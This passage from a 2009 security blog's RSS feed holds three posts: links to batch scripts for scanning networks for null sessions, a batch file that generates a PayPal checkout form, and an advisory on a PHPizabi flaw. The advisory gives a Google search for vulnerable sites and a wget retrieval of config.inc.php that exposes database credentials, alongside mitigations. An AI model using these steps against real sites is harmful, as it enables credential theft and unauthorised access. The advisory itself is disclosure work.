free to ask.</p>
<p>Part 1:</p>
<p>Verify the node is up: ShareScan: <a title="http://genxweb.net/wp-content/uploads/2007/06/shareup.zip" href="http://genxweb.net/wp-content/uploads/2007/06/shareup.zip" target="_blank">http://genxweb.net/wp-content/uploads/2007/06/shareup.zip</a></p>
<p>This script will go through a txt file and verify that the ips inside the file are up and if they are up moves it to another file that will be used by the scanner to check for null sessions.</p>
<p>Part 2:</p>
<p>Check for null session: Scan Share: <a title="http://genxweb.net/wp-content/uploads/2007/06/scanshare.zip" href="http://genxweb.net/wp-content/uploads/2007/06/scanshare.zip" target="_blank">http://genxweb.net/wp-content/uploads/2007/06/scanshare.zip</a></p>
<p>This script takes the IP addresses that are up from the results from the first part of the script and runs the net use commands on them checking for null sessions. Error checking is basic as we use a simple truth statement &amp;&amp; to say if it was mapped successfully then disconnect it.</p>
<p>Side note: I first published this article on my old site http://www.genxweb.net</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2009%2F09%2Fnull-session-scanning%2F&amp;title=Null%20Session%20Scanning" id="wpa2a_128"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2009/09/null-session-scanning/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PayPal Garage Sale Point of Sale system</title>
		<link>http://www.digitaloffensive.com/2009/09/paypal-garage-sale-point-of-sale-system/</link>
		<comments>http://www.digitaloffensive.com/2009/09/paypal-garage-sale-point-of-sale-system/#comments</comments>
		<pubDate>Wed, 23 Sep 2009 13:57:19 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://digitaloffensive.com/?p=23</guid>
		<description><![CDATA[PayPal Garage Sale Point of Sale system So I am about to have a garage sale and want to accept credit cards so people can&#8217;t say they don&#8217;t have money so I search all over the internet and there is nothing in the form of a POS for paypal users. So what do I do [...]]]></description>
			<content:encoded><![CDATA[<p><strong>PayPal Garage Sale Point of Sale system</strong></p>
<p>So I am about to have a garage sale and want to accept credit cards so people can&#8217;t say they don&#8217;t have money so I search all over the internet and there is nothing in the form of a POS for paypal users. So what do I do I create a down and dirty one using a simple Batch file.</p>
<p>Check out the code below.</p>
<p>Title Yard Sale Pyapal Check Out<br />
@echo off<br />
cls<br />
set /p ItemNo=Item No:<br />
set /p ItemName=Item Name:<br />
set /p Price=Price:<br />
pause</p>
<p>echo ^&lt;form target=&#8221;paypal&#8221; action=&#8221;https://www.paypal.com/cgi-bin/webscr&#8221; method=&#8221;post&#8221;^&gt;&gt;Out.htm<br />
echo ^&lt;input type=&#8221;hidden&#8221; name=&#8221;cmd&#8221; value=&#8221;_xclick&#8221;^&gt;^&lt;input type=&#8221;hidden&#8221; name=&#8221;amount&#8221; value=&#8221;%Price%&#8221;^&gt;&gt;&gt;Out.htm<br />
echo ^&lt;input type=&#8221;hidden&#8221; name=&#8221;business&#8221; value=&#8221; you@your.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it &#8220;^&gt;&gt;&gt;Ou<br />
t.htm<br />
echo ^&lt;input type=&#8221;hidden&#8221; name=&#8221;item_name&#8221; value=&#8221;%ItemName%&#8221;^&gt;&gt;&gt;Out.htm<br />
echo ^&lt;input type=&#8221;hidden&#8221; name=&#8221;item_number&#8221; value=&#8221;%ItemNo%&#8221;^&gt;&gt;&gt;Out.htm<br />
echo ^&lt;input type=&#8221;hidden&#8221; name=&#8221;return&#8221; value=&#8221;www.divepa.com/thanks.html&#8221;^&gt;&gt;&gt;Out.htm<br />
echo ^&lt;input type=&#8221;hidden&#8221; name=&#8221;cbt&#8221; value=&#8221;Continue&#8221;^&gt;&gt;&gt;Out.htm<br />
echo ^&lt;input type=&#8221;image&#8221; src=&#8221;cart.jpeg&#8221; border=&#8221;0&#8243; name=&#8221;submit&#8221; alt=&#8221;button&#8221;^&gt;^&lt;/form^&gt;&gt;&gt;Out.htm<br />
echo ^&lt;br^&gt;^&lt;br^&gt; &gt;&gt;out.htm<br />
echo You are purchasing item: %ItemName% for %Price% if you agree click the cart above and complete your transaction &gt;&gt;out.htm</p>
<p>pause<br />
start /max &#8220;C:\Program Files\Internet Explorer\iexplore.exe&#8221; Out.htm</p>
<p>All you do is copy the above code into a notepad file and save the file as paypal.cmd then double click it and fill in the blanks. Make sure you change the email field first to your paypal email account.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2009%2F09%2Fpaypal-garage-sale-point-of-sale-system%2F&amp;title=PayPal%20Garage%20Sale%20Point%20of%20Sale%20system" id="wpa2a_130"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2009/09/paypal-garage-sale-point-of-sale-system/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PHPizabi: Possible vulnerability in information disclosure and database integrity</title>
		<link>http://www.digitaloffensive.com/2009/09/phpizabi-possible-vulnerability-in-information-disclosure-and-database-integrity/</link>
		<comments>http://www.digitaloffensive.com/2009/09/phpizabi-possible-vulnerability-in-information-disclosure-and-database-integrity/#comments</comments>
		<pubDate>Wed, 23 Sep 2009 13:39:56 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Security Advisories]]></category>

		<guid isPermaLink="false">http://digitaloffensive.com/?p=7</guid>
		<description><![CDATA[PHPizabi: Possible vulnerability in information disclosure and database integrity Vendor: Notified. I notified the vendor of this issue over three months ago and have not heard back from them regarding this threat. According to their website there has been no patches or core releases released since the ones I have listed below. Version: PHPizabi 0.848b [...]]]></description>
			<content:encoded><![CDATA[<p><strong>PHPizabi: Possible vulnerability in information disclosure and database integrity</strong></p>
<p><strong>Vendor:</strong> Notified. I notified the vendor of this issue over three months ago and have not heard back from them regarding this threat. According to their website there has been no patches or core releases released since the ones I have listed below.</p>
<p><strong>Version:</strong> PHPizabi 0.848b C1 HFP1 (Alicia)</p>
<p><strong>Hot fixes: </strong> 848 Core HotFix Pack 3 0848bC1_HFP3.zip and below</p>
<p><strong>Product Info:</strong></p>
<p>“More than a simple script, dating script, or even just a matchmaker; PHPizabi is a feature rich social networking platform that integrates everything you need to jumpstart your community, dating site, or social networking portal right out of the box. PHPizabi is one of the most reliable, safe, and solid platforms on the market, offering your users features they could only dream of.”</p>
<p><strong>Vulnerability:</strong></p>
<p>In the default configuration and installation of this script the “system” dir is left open allowing indexing. When I discovered that the system dir was open I was able to download the configuration file that contained sensitive information about the site such as the database connection information including username and password.</p>
<p><strong>To exploit</strong></p>
<p>1)      Google: “Powered by PHPizabi”</p>
<p>2)      http://sitename.com/system/</p>
<p>3)      Download file open in editor.</p>
<p>Temp solutions:</p>
<p>1)      Add a .htacess to the system dir that says</p>
<p>a.       Options –Indexes</p>
<p>b.      Note this will not stop the attacker from using wget and http://sitename.com/system/config.inc.php from retrieving the file.</p>
<p>2)      Make sure that the database can only be accessed local.</p>
<p>a.       The host I had permission to test this on had the database open to remote connections.</p>
<p>Vendor should have the file die if trying to access it directly like they do if you try to access a file in the admin directory directly.</p>
<p>Tested on: This has been tested against my site www.xxxxxxxx.com I have done some edits to the code to protect my site and contacted the host about the database settings. Site address has been “X” out to protect it from people trying the attack against it.</p>
<p>Vulnerability Classification: Possible vulnerability in information disclosure and database integrity.</p>
<p>Thanks</p>
<p>Michael LaSalvia</p>
<p>www.digitaloffensive.com</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2009%2F09%2Fphpizabi-possible-vulnerability-in-information-disclosure-and-database-integrity%2F&amp;title=PHPizabi%3A%20Possible%20vulnerability%20in%20information%20disclosure%20and%20database%20integrity" id="wpa2a_132"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2009/09/phpizabi-possible-vulnerability-in-information-disclosure-and-database-integrity/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

